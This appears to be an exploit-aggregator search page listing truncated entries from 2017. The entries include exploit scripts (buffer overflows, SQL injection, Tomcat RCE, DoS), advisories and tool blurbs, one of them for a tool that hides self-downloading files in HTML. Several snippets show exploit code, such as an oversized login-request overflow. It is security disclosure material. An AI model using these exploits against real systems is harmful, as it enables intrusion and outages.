1321 matches found
Open-Xchange: SSRF - RSS feed, blacklist bypass (IP Formatting)
FYI - Tested on local installation of App Suite 7.8.4 REV 17. Hello, there appears to be a SSRF vulnerability in the below endpoint. This is due to a failure in the App Suite code when evaluating an IP address against a blacklist. The SSRF is limited to scanning hosts on port 80/443 but accuracy i...
SocuSoft Co. Photo 2 Video Converter 8.0.0 Code Execution / DoS
CONTACT: Twitter: @ret2eax Email: [email protected] Blog:...
EmbedInHTML - Embed and hide any file in an HTML file
What this tool does is take a file (any type of file), encrypt it, and embed it into an HTML file as a resource, along with an automatic download routine simulating a user clicking on the embedded resource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, save...
Vonage VDV-23 - Denial of Service Exploit
Exploit for hardware platform in category dos / poc Overview During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will...
Dup Scout Enterprise 10.0.18 - Login Buffer Overflow Exploit
Exploit for windows platform in category remote exploits Tested on Windows 10 x86 The application requires to have the web server enabled. Exploit for older version: https://www.exploit-db.com/exploits/40832/ !/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser...
Linux Process Hunter: Prochunter
Prochunter aims to find processes hidden by all userspace and most kernelspace rootkits. This tool is composed of a kernel module that prints out all running processes walking the task_struct list and creates /sys/kernel/prochunter/set entry. A python script that invokes the kernel function...
KRACK Detector - Detect and prevent KRACK attacks in your network
KRACK Detector is a Python script to detect possible KRACK attacks against client devices on your network. The script is meant to be run on the Access Point rather than the client devices. It listens on the Wi-Fi interface and waits for duplicate message 3 of the 4-way handshake. It then...
Easy MPEG/AVI/DIVX/WMV/RM To DVD Buffer Overflow
!/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link: http://www.divxtodvd.net/easyvideotodvd.exe Tested On: Windows 7 x64 To reproduce...
Apache James Deserialization RCE(CVE-2017-12628)
Analysis of CVE-2017-12628 This morning I spotted a tweet mentioning an “Apache James 3.0.1 JMX Server Deserialization” vulnerability, CVE-2017-12628, which caught my eye because I wrote a generic JMX deserialization exploit which is included in my RMI attack tool BaRMIe. A quick search for more...
Check_MK 1.2.8p25 - Information Disclosure
CheckMK 1.2.8p25 - Information Disclosure 1. ADVISORY INFORMATION ======================= Product: Checkmk Vendor URL: https://mathias-kettner.de/checkmk.html Type: Race Condition CWE-362 Date found: 2017-09-21 Date published: 2017-10-18 CVSSv3 Score: 7.5...
Opentext Documentum Content Server File Hijack / Privilege Escalation
!/usr/bin/env python Opentext Documentum Content Server formerly known as EMC Documentum Content Server does not properly validate input of PUTFILE RPC-command which allows any authenticated user to hijack arbitrary file from Content Server filesystem, because some files on Content Server...
Apache Tomcat Upload Bypass / Remote Code Execution
!/usr/bin/python import requests import re import signal from optparse import OptionParser class bcolors: HEADER = '\03395m' OKBLUE = '\03394m' OKGREEN = '\03392m' WARNING = '\03393m' FAIL = '\03391m' ENDC = '\0330m' BOLD = '\0331m' UNDERLINE = '\0334m' banner=""" / \ \ / / | | \ / / | | / | \ /...
Wifite 2 - A complete re-write of Wifite (Automated Wireless Attack Tool)
A complete re-write of wifite, a Python script for auditing wireless networks. What's new? Lots of files instead of "one big script". Cleaner process management -- No longer leaves processes running in the background. UX: Target access points are refreshed every second instead of every 5 seconds...
Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)
!/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link: http://www.divxtodvd.net/easyvideotodvd.exe Tested On: Windows 7 x64 To reproduce...
UEFI Firmware Parser
The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials. Installation This module is includ...
Dnsmasq < 2.78 - Information Leak Exploit
Exploit for multiple platform in category dos / poc ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup...
FileRun 2017.09.18 SQL Injection
!/usr/bin/env python Exploit Title: FileRun =2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...
Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)
!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak
!/usr/bin/env python3 Optionsbleed proof of concept test by Hanno Böck import argparse import urllib3 import re def testbleedurl, args: r = pool.request'OPTIONS', url try: allow = strr.headers"Allow" except KeyError: return False if allow in dup: return dup.appendallow if allow == "": print"empty...
Astaro Security Gateway 7 - Remote Code Execution
Astaro Security Gateway 7 - Remote Code Execution !/usr/bin/python Astaro Security Gateway v7 - Unauthenticated Remote Code Execution Exploit Authors: Jakub Palaczynski and Maciej Grabiec Tested on versions: 7.500 and 7.506 Date: 13.12.2016 Vendor Homepage: https://www.sophos.com/ CVE:...